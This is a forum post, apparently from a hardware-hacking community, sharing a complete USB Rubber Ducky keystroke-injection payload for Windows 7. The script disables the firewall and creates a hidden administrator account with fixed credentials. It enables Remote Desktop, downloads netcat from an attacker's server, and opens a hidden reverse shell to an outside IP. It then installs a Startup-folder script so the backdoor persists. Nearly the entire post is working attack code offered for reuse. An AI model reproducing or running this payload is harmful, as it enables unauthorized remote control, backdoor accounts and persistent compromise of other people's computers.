skysploit Posted March 29, 2013 (edited)

Hello,

Here's a new payload that I came up with. It targets Windows 7 w/ UAC enabled. Here's what happens when you run it...

- Opens an admin command prompt
- Creates an admin user (default creds: hacker | mysecretpassword)
- Disables the Windows Firewall
- Enables Remote Desktop
- Enables Remote Assistance
- Hides the newly created admin account from the Windows Welcome Screen
- Creates a VBScript to run a hidden instance of Netcat
- Creates a batch file to launch Netcat (this is needed to mask an open Netcat session from the desktop)
- Downloads Netcat from the attacker's web server (to transfer Netcat to the web directory in Kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe; launch Apache with: service apache2 start)
- Calls the VBScript to launch the hidden Netcat shell
- Creates a batch file in the Startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs)

So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend.
~skysploit

REM ~Persistence~ - Windows 7 w/ UAC, USB Rubber Ducky script (one command per line)
REM Open an elevated cmd: Start menu search, context menu, "Run as administrator", accept UAC
DELAY 5000
ESCAPE
DELAY 300
CONTROL ESCAPE
DELAY 300
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
DELAY 300
ENTER
DELAY 800
REM Disable the firewall (legacy "netsh firewall" context; still works on Windows 7 with a deprecation warning)
STRING netsh firewall set opmode disable
ENTER
DELAY 300
REM Create the admin account; the "y" answers net user's prompt for a password longer than 14 characters
STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
REM Enable Remote Desktop and Remote Assistance
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
REM Hide the account from the Welcome Screen
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
ENTER
DELAY 300
REM VBScript that runs nc.bat with a hidden window (the elevated prompt starts in C:\Windows\System32, so the files land there)
STRING copy con nc.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
REM cmdow is a third-party tool, not shipped with Windows; this payload does not download it, so that line only works if it is already on the box
STRING echo cmdow @ /hid >> nc.bat
ENTER
STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat
ENTER
REM Fetch nc.exe from the attacker's web server (URL and destination are separate quoted arguments)
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe','c:\Windows\system32\nc.exe');
ENTER
STRING cscript nc.vbs
ENTER
REM All-users Startup folder via the legacy junction path; the real Windows 7 location is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
ENTER
STRING echo cmdow @ /hid >> persistence.bat
ENTER
STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat
ENTER
STRING exit
ENTER

Edited March 30, 2013 by skysploit
skysploit Posted March 30, 2013 (Author)

~Persistence~ has been added to the Simple-Ducky Payload Generator. See the forum post below for a link to download :)

~skysploit

http://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v14-international-key-mappingkali-linux-compatible/